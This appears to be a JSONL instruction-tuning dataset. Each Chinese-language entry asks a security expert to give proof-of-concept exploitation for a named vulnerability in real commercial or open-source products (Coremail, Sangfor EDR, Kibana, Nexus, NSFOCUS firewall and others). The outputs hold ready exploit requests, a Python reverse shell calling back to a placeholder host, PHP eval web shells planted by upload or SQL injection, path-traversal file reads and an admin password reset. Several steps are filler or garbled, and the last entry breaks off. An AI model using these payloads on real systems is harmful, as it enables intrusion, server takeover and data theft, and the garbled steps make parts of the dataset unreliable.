  697. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Coremail 路径遍历与文件上传漏洞\n漏洞描述:监测到Coremail论客邮件系统存在路径遍历与文件上传漏洞,攻击者可利用/lunkr/cache/;/;/../../manager/html 设置参数X-Forwarded-For: 127.0.0.1.Coremail 的 nginx 配置文件中,未针对/lunkr/cache 路径向上解析的时候做 X-Forwarded-For 字段的限制,从而可以利用该接口实现配合利用 nginx 不解析,但 tomcat 解析的差异特性,实现绕过 tomcat manager 的本地 ip 限制。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 通过/lunkr/cache/;/;/../../manager/html进入Tomcat控制台,部署war包进行getshell。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Coremail 路径遍历与文件上传漏洞.md"}
    698. 

  698. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 EDR c.php 远程命令执行漏洞 CNVD-2020-46552\n漏洞描述:深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。\n影响版本:``` EDR v3.2.16 EDR v3.2.17 EDR v3.2.19 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. EDR v3.2.16\nEDR v3.2.17\nEDR v3.2.19\n2. https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&limit=whoami\nhttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami\nhttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&path=whoami\nhttps://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&row=whoami\n3. POST /tool/log/c.php HTTP/1.1\nHost: x.x.x.x\nUpgrade-Insecure-Requests: 1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\nAccept-Language: zh-CN,zh;q=0.9\nContent-Length: 256\n\nstrip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"xxx.xxx.xxx.xxx\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 EDR c.php 远程命令执行漏洞 CNVD-2020-46552.md"}
    699. 

  699. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Metabase任意文件读取漏洞 CVE-2021-41277\n漏洞描述:Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。 参考链接: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://github.com/tahtaciburak/CVE-2021-41277\n影响版本:``` metabase 0.40.0-0.40.4 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-41277\n【POC利用方法】\n1. metabase 0.40.0-0.40.4\n2. docker-compose up -d\n3. curl -v http://your-ip:3000/api/geojson?url=file:////etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Metabase任意文件读取漏洞 CVE-2021-41277.md"}
    700. 

  700. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GitLab 任意文件读取漏洞 CVE-2016-9086\n漏洞描述:GitLab是一款Ruby开发的Git项目管理平台。在8.9版本后添加的“导出、导入项目”功能,因为没有处理好压缩包中的软连接,已登录用户可以利用这个功能读取服务器上的任意文件。 参考链接: - https://about.gitlab.com/releases/2016/11/02/cve-2016-9086-patches/ - https://hackerone.com/reports/178152 - http://paper.seebug.org/104/\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2016-9086\n【POC利用方法】\n1. docker-compose up -d\n2. - http://paper.seebug.org/104/\n3. > 注意,请使用2G及以上内存的VPS或虚拟机运行该环境,实测1G内存的机器无法正常运行GitLab(运行后502错误)。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GitLab 任意文件读取漏洞 CVE-2016-9086.md"}
    701. 

  701. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449\n漏洞描述:Atlassian Jira groupuserpicker接口存在用户信息枚举漏洞,攻击者通过漏洞可以获取应用中的使用者账户名称,来进行进一步渗透\n影响版本:``` Atlassian Jira <8.4.0 ```\n网络测绘:``` app=\"ATLASSIAN-JIRA\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-8449\n【POC利用方法】\n1. Atlassian Jira <8.4.0\n2. app=\"ATLASSIAN-JIRA\"\n3. /rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449.md"}
    702. 

  702. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137\n漏洞描述:Roxy-Wi options.py 存在远程命令执行漏洞,攻击者通过漏洞可以执行命令获取服务器权限\n影响版本:``` Roxy-WI ```\n网络测绘:``` app=\"HAProxy-WI\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-31137\n【POC利用方法】\n1. app=\"HAProxy-WI\"\n2. POST /app/options.py\n  \nalert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1\n3. POST /app/options.py HTTP/1.1\nHost: your-ip\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 105\nOrigin: https://x.x.x.x\nDnt: 1\nReferer: https://x.x.x.x/app/login.py\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\nalert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137.md"}
    703. 

  703. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592\n漏洞描述:Alibaba otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 参考链接: * https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 * https://forum.ywhack.com/thread-115309-1-8.html\n网络测绘:``` title=\"Otter Manager\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"Otter Manager\"\n2. * https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592\n3. * https://forum.ywhack.com/thread-115309-1-8.html\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md"}
    704. 

  704. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金山 V8 终端安全系统 downfile.php 任意文件读取漏洞\n漏洞描述:金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件\n影响版本:``` 金山 V8 终端安全系统 ```\n网络测绘:``` title=\"在线安装-V8+终端安全系统Web控制台\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 金山 V8 终端安全系统\n2. title=\"在线安装-V8+终端安全系统Web控制台\"\n3. <?php\t\n\t\t\t$filename= $_GET[\"filename\"];\n            \n\t\t\t$filename=iconv(\"UTF-8\",\"GBK//IGNORE\", $filename);\n\n   \t\t\theader(\"Cache-Control: public\"); \n\t\t\theader(\"Content-Description: File Transfer\"); \n\t\t\theader('Content-disposition: attachment; filename='.$filename); //文件名   \n\t\t\theader(\"Content-Type: application/zip\"); //zip格式的   \n\t\t\theader(\"Content-Transfer-Encoding: binary\"); //告诉浏览器,这是二进制文件    \n\t\t\theader('Content-Length: '. filesize($filename)); //告诉浏览器,文件大小   \n\t\t\t@readfile($filename);\n\t\t\t?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金山 V8 终端安全系统 downfile.php 任意文件读取漏洞.md"}
    705. 

  705. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:360天擎 rptsvcsyncpoint 前台SQL注入\n漏洞描述:天擎 存在SQL注入,攻击者可以通过漏洞上传木马\n影响版本:``` 天擎 ```\n网络测绘:``` title=\"360新天擎\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"360新天擎\"\n2. 注入写shell:\nhttps://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\\Program Files (x86)\\360\\skylar6\\www\\1.php';drop table O;--  \n\n\n利用过程:\n1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell\n2. 通过注入点,创建一张表 O\n3. 为 表O 添加一个新字段 T 并且写入shell内容\n4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)\n5. 删除 表O\n3. sqlmap -u https://xxx.xxx.xxx.xxx:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/360天擎 rptsvcsyncpoint 前台SQL注入.md"}
    706. 

  706. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐起云 xiazai 任意文件读取漏洞\n漏洞描述:锐起云 xiazai 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件。\n影响版本:锐起云 v3.6\n网络测绘:``` \"锐起云\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. /dwr/hret/fileTree?filePath=../\n/dwr/srecy/xiazai?filePath=../../../../../../../../../../../Windows/win.ini\n/dwr/hret/downfile?fpid=../../../../../../../../../Windows/win.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/锐起云 xiazai 任意文件读取漏洞.md"}
    707. 

  707. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞\n漏洞描述:昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞\n影响版本:``` 昆石网络 VOS3000虚拟运营支撑系统 ```\n网络测绘:``` app=\"VOS-VOS3000\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 昆石网络 VOS3000虚拟运营支撑系统\n2. app=\"VOS-VOS3000\"\n3. /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md"}
    708. 

  708. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:畅捷CRM get_usedspace.php SQL注入漏洞\n漏洞描述:畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息\n影响版本:``` 畅捷CRM ```\n网络测绘:``` title=\"畅捷CRM\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"畅捷CRM\"\n2. /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--\n3. sqlmap -u \"http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1\" -p site_id\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md"}
    709. 

  709. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Richmail 企业邮箱 noCookiesMail 登陆绕过漏洞\n漏洞描述:Richmail 企业邮箱 noCookiesMail 接口存在登陆绕过漏洞,攻击者通过漏洞可以获取管理员账号密码登录后台\n影响版本:Richmail 企业邮箱\n网络测绘:``` \"Richmail 企业邮箱\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"Richmail 企业邮箱\"\n2. GET /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin HTTP/1.1 \nHost:\nCache-Control: max-age=0 \nContent-Type: Application/X-www-Form\nx-forwarded-for: 127.0.0.1\n3. Cache-Control: max-age=0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Richmail 企业邮箱 noCookiesMail 登陆绕过漏洞.md"}
    710. 

  710. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kibana 本地文件包含漏洞 CVE-2018-17246\n漏洞描述:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ - https://www.anquanke.com/post/id/168291\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-17246\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd\n3. export default {asJson: function() {return require(\"child_process\").execSync(\"id\").toString()}}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Kibana 本地文件包含漏洞 CVE-2018-17246.md"}
    711. 

  711. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞\n漏洞描述:汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息\n影响版本:``` 汇文v5.6 ```\n网络测绘:``` app=\"汇文软件-书目检索系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"汇文软件-书目检索系统\"\n2. /include/config.properties\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md"}
    712. 

  712. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002\n漏洞描述:*Seo Panel*是一个网站搜索引擎优化管理的完整控制面板。它包含了多个SEO工具来增加和跟踪你的网站性能 Seo-Panel 4.8.0以下版本存在过滤不完全的情况,造成存在 反射型XSS漏洞\n影响版本:``` Seo-Panel  Version < 4.8.0 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-3002\n【POC利用方法】\n1. Seo-Panel  Version < 4.8.0\n2. POST /login.php?sec=forgot HTTP/1.1\nHost: 192.168.51.133\nContent-Length: 118\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nOrigin: http://192.168.51.133\nContent-Type: application/x-www-form-urlencoded\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://192.168.51.133/login.php?sec=forgot\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: PHPSESSID=i0qk20ehq89b29ct8krpv76vn3; yzmphp_adminid=33d5DywYQIUGS13SI7x4I0y7JiCacraGcDU1uoBx; yzmphp_adminname=1fc8yAdCyAogZ-PIz4c66dU1ij0mHsG7KGF_5tToVThEzbc\nConnection: close\n\nsec=requestpass&email=peiqi%40peiqi.com%22%3E%3Cimg+src%3Da+onerror%3Dalert%28%22peiqi%22%29%3Egcuak&code=12345&login=\n3. Origin: http://192.168.51.133\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002.md"}
    713. 

  713. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:nginxWebUI cmdOver 后台命令执行漏洞\n漏洞描述:nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限\n影响版本:``` nginxWebUI ```\n网络测绘:``` title=\"nginxwebui\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"nginxwebui\"\n2. POST /adminPage/remote/cmdOver\n\nremoteId=local&cmd=start|id&interval=1\n3. POST /adminPage/remote/cmdOver\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md"}
    714. 

  714. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 NF下一代防火墙 任意文件上传漏洞\n漏洞描述:绿盟 SSLVPN 存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行\n影响版本:绿盟 SSLVPN\n网络测绘:``` app=\"NSFOCUS-下一代防火墙\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"NSFOCUS-下一代防火墙\"\n2. POST /api/v1/device/bugsInfo HTTP/1.1\nContent-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9\nHost: \n\n--1d52ba2a11ad8a915eddab1a0e85acd9\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\n\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\n\n--1d52ba2a11ad8a915eddab1a0e85acd9--\n3. POST /api/v1/device/bugsInfo HTTP/1.1\nContent-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef\nHost: \n\n--4803b59d015026999b45993b1245f0ef\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\n\n\n<?php eval($_POST['cmd']);?>\n\n--4803b59d015026999b45993b1245f0ef--\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 NF下一代防火墙 任意文件上传漏洞.md"}
    715. 

  715. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444\n漏洞描述:Nexus Repository Manger存在低权限修改管理员密码漏洞,低权限用户发送特定的请求包可以修改管理员账号密码\n影响版本:``` Nexus  3.x OSS / Pro <= 3.21.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-11444\n【POC利用方法】\n1. Nexus  3.x OSS / Pro <= 3.21.1\n2. PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1\nHost: \naccept: application/json\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\nNX-ANTI-CSRF-TOKEN: 0.6080434247960143\nContent-Type: text/plain\nOrigin: http://139.198.174.173:8081\nCookie: NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=76b37c99-046c-47a9-ba7d-fd4cfa33b7ff\nContent-Length: 11\n\ndata=123456\n3. https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444.md"}
    716. 

  716. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba Canal config 云密钥信息泄露漏洞\n漏洞描述:由于/api/v1/canal/config  未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露\n影响版本:``` Alibaba Canal ```\n网络测绘:``` title=\"Canal Admin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Alibaba Canal\n2. title=\"Canal Admin\"\n3. /api/v1/canal/config/1/0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba Canal config 云密钥信息泄露漏洞.md"}
    717. 

  717. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SpiderFlow save 远程命令执行漏洞\n漏洞描述:SpiderFlow 平台以流程图的⽅式定义爬虫,是⼀个高度灵活可配置的爬虫平台 官⽹:https://www.spiderflow.org/\n影响版本:``` SpiderFlow ```\n网络测绘:``` title==\"SpiderFlow\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title==\"SpiderFlow\"\n2. POST /function/save\n\nid=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{\n3. 官⽹:https://www.spiderflow.org/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/SpiderFlow save 远程命令执行漏洞.md"}
    718. 

  718. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480\n漏洞描述:KubeOperator 是一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 Kubernetes 集群。CVE-2023-22480 中,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息。\n影响版本:KubeOperator < 3.16.4\n网络测绘:``` app=\"KubeOperator\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22480\n【POC利用方法】\n1. app=\"KubeOperator\"\n2. /api/v1/clusters/kubeconfig/k8s\n3. 验证POC (k8s为集群名称,不固定)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480.md"}
    719. 

  719. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞\n漏洞描述:瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 瑞友应用虚拟化系统 7.0.2.1 ```\n网络测绘:``` \"CASMain.XGI?cmd=GetDirApp\" && title==\"瑞友应用虚拟化系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 瑞友应用虚拟化系统 7.0.2.1\n2. \"CASMain.XGI?cmd=GetDirApp\" && title==\"瑞友应用虚拟化系统\"\n3. /index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\\\Program+Files+(x86)\\\\RealFriend\\\\Rap+Server\\\\WebRoot\\\\test7.php%27%23/123\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md"}
    720. 

  720. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:紫光档案管理系统 upload.html 后台文件上传漏洞\n漏洞描述:紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统后台存在文件上传漏洞。攻击者可利用漏洞获取数据库敏感信息。\n影响版本:``` 紫光电子档案管理系统 ```\n网络测绘:``` app=\"紫光档案管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"紫光档案管理系统\"\n2. POST /System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1\nHost: \nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nContent-Length: 614\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT\n\n------WebKitFormBoundarygIRYWNxmDYiZBguT\nContent-Disposition: form-data; name=\"userID\"\n\nadmin\n------WebKitFormBoundarygIRYWNxmDYiZBguT\nContent-Disposition: form-data; name=\"fondsid\"\n\n1\n------WebKitFormBoundarygIRYWNxmDYiZBguT\nContent-Disposition: form-data; name=\"comid\"\n\n1\n------WebKitFormBoundarygIRYWNxmDYiZBguT\nContent-Disposition: form-data; name=\"token\"\n\n6b79a77180e9ec3a7ca351ebe54641a2\n------WebKitFormBoundarygIRYWNxmDYiZBguT\nContent-Disposition: form-data; name=\"files[]\"; filename=\"phpinfo.php\"\nContent-Type: text/php\n\n<?php phpinfo();?>\n------WebKitFormBoundarygIRYWNxmDYiZBguT--\n3. Accept: application/json, text/javascript, */*; q=0.01\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/紫光档案管理系统 upload.html 后台文件上传漏洞.md"}
    721. 

  721. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞\n漏洞描述:亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,获取主机权限。 参考链接: - https://github.com/di0xide-U/YSTupload/blob/main/exp.md\n影响版本:亿赛通 电子文档安全管理系统\n网络测绘:``` app=\"亿赛通-电子文档安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"亿赛通-电子文档安全管理系统\"\n2. POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1\nHost: your-ip\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0\nAccept: */*\nContent-Length: 1\n\nTest\n3. Shell访问地址:https://your-ip/tttT.jsp\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞.md"}
    722. 

  722. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞\n漏洞描述:银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件\n影响版本:``` 银达汇智 智慧综合管理平台 ```\n网络测绘:``` \"汇智信息\" && title==\"智慧综合管理平台登入\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 银达汇智 智慧综合管理平台\n2. \"汇智信息\" && title==\"智慧综合管理平台登入\"\n3. POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1\nHost: \nAccept-Encoding: identity\nContent-Length: 337\nAccept-Language: zh-CN,zh;q=0.8\nAccept: */*\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0\nAccept-Charset: GBK,utf-8;q=0.7,*;q=0.3\nConnection: keep-alive\nCache-Control: max-age=0\nContent-Type: multipart/form-data; 